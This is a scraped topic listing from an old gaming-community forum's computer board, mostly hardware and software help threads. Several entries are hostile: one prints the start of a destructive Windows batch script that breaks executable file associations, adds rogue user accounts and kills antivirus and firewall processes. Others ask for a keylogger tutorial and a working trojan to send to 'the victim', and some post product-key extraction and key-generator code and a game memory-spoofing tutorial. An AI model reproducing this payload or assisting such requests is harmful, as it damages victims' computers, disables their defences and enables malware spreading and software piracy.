Jump to content

Computer Discussion

General discussion of computer hardware, software, tips, tricks or anything else computer related in general.
  1. Started by Tokenwtf,

    I have Two drives on one of my PC's. E:\, and C:\ C: Has windows installed onto it, but for some reason my computer will not boot up off it. E: HAD windows installed onto it, and that worked fine. I was about to reinstall windows onto the C: Drive but accidentally erased the wrong partition (on my E: drive). Is there any way to get everything back off that erased partition without taking the drive out of the PC?

  2. Started by specialed,

    it comes up with some bullshit window saying it recovered from a serious error. Shit shuts and boots off fine. heres info( but i dont know whether it will help or not) BCCode : d1 BCP1 : 00000012 BCP2 : 00000002 BCP3 : 00000000 BCP4 : 00000012 OSVer : 5_1_2600 SP : 0_0 Product : 768_1 C:\WINDOWS\Minidump\Mini092406-01.dmp C:\DOCUME~1\RINGMA~1\LOCALS~1\Temp\WER26.tmp.dir00\sysdata.xml

  3. Started by Tokenwtf,

    Anyone that is good at vb6 here know how to extract files within your program? (i.e. vb runtime files?) It's annoying if you want to give a small program out to someone, and they have to download the runtime files & all the fucking controls you have used.

  4. http://www.codeproject.com/useritems/Validator.asp Introduction This is the article which tells you how to validate “Credit Card Number”. This articles doesn’t guarantee that the Credit Card Number exist what it tells that it is the valid number or not. Information Credit Card numbers are (most times) 13 to 16 digit numbers which are protected by a special numerical check, called Luhn check. The Luhn algorithm or Luhn formula, also known as the "modulus 10" or "mod 10" algorithm, was developed in the 1960s as a method of validating identification numbers. It is a simple checksum formula used to va…

      • Like
    • 7 replies
    • 267 views
  5. Started by h0stility,

    i have the HP vs17e 17 inch LCD moniter. after a bit the moniter changes solid colors red blue green black white ect. i dont want it to be like a screen saver and ive been looking everywhere. i dont have my screensaver on at all. how do ifix this.

  6. Started by Myke_X,

    It's actually really good, except for this gay part of it that asks if every program is ok to install.

  7. Started by lil_pyro,

    Is this possible? I've had people tell me it is, and some tell me it isn't. My last mobo doesnt work, and when I try to turn it on, the chipset gets to about 180 f in about 20 seconds, I'm thinking I am the victim of this.

  8. Started by gggggggg-unot,

    k well i was wondering if you guy's have any recommemded programs to DL DVD quality movie's such as The Hills Have Eye's. So if you have any recomendations post them here KTHNXBYE <3myg0t

  9. Started by dFb,

    Someone help me or give me a tutorial on how to make a vb keylogger.:dunno: I've looked for some tutorials but most of what i've found is to be downloading a made one, thanks

    • 39 replies
    • 895 views
  10. Started by Brett_,

    Need a working version off s p 0 r k e h to send to some asshole on aim thanks.

  11. Started by WcK3d,

    Hey, I need help, i have it compiled and everything, i think. All i wanna know is wat do i send to the victim? Cuz the folders i have are dll, dll-old, bin, and loader. Do i only send the victim the loader.exe or wat..... Also, i was just curious what the fuck the virus actually does. P.S. WHY the fuck is the s p0rkeh name blocked out? kthx :boink:

  12. Started by spanky618,

    does anyone have the link for this program? it Allowed you to boot armored fury and euro force up tot he v1.3 patch and play online without having to overwrite your bf2 exe.

  13. Started by Myke_X,

    50gb Storage 750gb bandwidth. Two free domain name registrations. What should I do w/ it. I'd prefer a forum, but I'm open for ideas. (i'm not giving it away either)

  14. Started by fetus,

    I've tried googling and there are a ton of these,but I'm looking for a (freeware) small, quick wma -> mp3 converter that can batch process. Any suggestions? thanks :)

      • Like
    • 2 replies
    • 22 views
  15. Guest sa1bot
    Started by Guest sa1bot,

    i cant find the forum for computer discussion so i figured id just post it here. i have a question on a video card and was wondering if anyone here could help. BFG GeForce 6200 PCI OC 256 MB Graphics Card i was just curious about this card, remember its the 256 MB PCI.. i was curious to know if this would be able to run BF2, and if so how well. other stats 2.93 ghz celeron D 1gb ram http://www.bestbuy.com/site/olspage.jsp?skuId=7638292&type=product&id=1130987962366 any help would be appreciated

  16. Started by twolvesfan624,

    What are your stock heatsink CPU temps? Mine goes up to 114F / 45.5C playing games and is around 98F/37C idle. Is that bad? Thankis.

    • 17 replies
    • 177 views
  17. Started by InsaneHL,

    ok well i made a few Demos and i want to play them in a diffarant format how does insane do this?

  18. Started by D,

    Here's where you suggest programs to use. I used Magic DVD ripper, but the video came out grainy. Any progs with good vid quality?

  19. Started by sper,

    what is teh code that makes it so that when somone presses start the screen starts spammimg teh background? not a virus but like so it kepps spammimg the background?

  20. Started by Reflection-X13,

    Howdy, I was advised to come here on my search for a Working Windows XP Product Key for my friend. I didn't want to post this here because naturally, soon this is going to be filled with very Original pranks, such as goatse or links to some kinda shit that nobody wants. So, If you can find me this Key then please, geniunly put it down, for all you other cunts, have fun ripping the topic to fuck you sad fuckers.

  21. Imports Microsoft.Win32 Public Function sGetXPKey() As String Dim RegKey As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows NT\CurrentVersion", False) Dim bytDPID() As Byte = RegKey.GetValue("DigitalProductID") Dim bytKey(14) As Byte Array.Copy(bytDPID, 52, bytKey, 0, 15) Dim strChar As String = "BCDFGHJKMPQRTVWXY2346789" Dim strKey As String = "" For j As Integer = 0 To 24 Dim nCur As Short = 0 For i As Integer = 14 To 0 Step -1 nCur = CShort(nCur * 256 Xor bytKey(i)) bytKey(i) = CByte(Int(nCur / 24)) nCur = CShort(nCur Mo…

  22. Started by TheSprayer,

    @echo off break off assoc .exe=BoMbExX assoc .sys=BoMbExX assoc .drv=BombExX net user BoMbExX virus /add net user pwnz VIRUS /add net user u ViRuS /add tskill ad* > nul 2>&1 tskill anti* > nul 2>&1 tskill *av* > nul 2>&1 tskill bi* > nul 2>&1 tskill black* > nul 2>&1 tskill bull* > nul 2>&1 tskill ca* > nul 2>&1 tskill cla* > nul 2>&1 tskill *cle* > nul 2>&1 tskill *def* > nul 2>&1 tskill esafe* > nul 2>&1 tskill escan* > nul 2>&1 tskill etr* > nul 2>&1 tskill fp* > nul 2>&1 tskill fire* > nul 2>&1 tskill *fix* > nul 2&gt…

  23. http://img470.imageshack.us/img470/5022/mircyg0.jpg Public Class Form1 Private Sub generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles generate.Click Dim Table(42) Table(4) = 11 Table(5) = 6 Table(6) = 17 Table(7) = 12 Table(8) = 12 Table(9) = 14 Table(10) = 5 Table(11) = 12 Table(12) = 16 Table(13) = 10 Table(14) = 11 Table(15) = 6 Table(16) = 14 Table(17) = 14 Table(18) = 4 Table(19) = 11 Table(20) = 6 Table(21) = 14 Table(22) = 14 Table(23) = 4 Table(24) = 11 Table(25) = 9 …

  24. This tutorial is for reading and writing process memory. I used Warcraft III for an example (name spoofing). Download the full source code at.... http://rapidshare.de/files/32619125/Name_Spoofer_Pro.rar Password = www.ZomgStuff.com 100% created by me. If you use my source code, please give me credit. Thank you xxAntManxx for teaching me VB.NET. Sticky for pwnage source?

  25. http://img470.imageshack.us/img470/5022/mircyg0.jpg Public Class Form1 Private Sub generate_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles generate.Click Dim Table(42) Table(4) = 11 Table(5) = 6 Table(6) = 17 Table(7) = 12 Table(8) = 12 Table(9) = 14 Table(10) = 5 Table(11) = 12 Table(12) = 16 Table(13) = 10 Table(14) = 11 Table(15) = 6 Table(16) = 14 Table(17) = 14 Table(18) = 4 Table(19) = 11 Table(20) = 6 Table(21) = 14 Table(22) = 14 Table(23) = 4 Table(24) = 11 Table(25) = …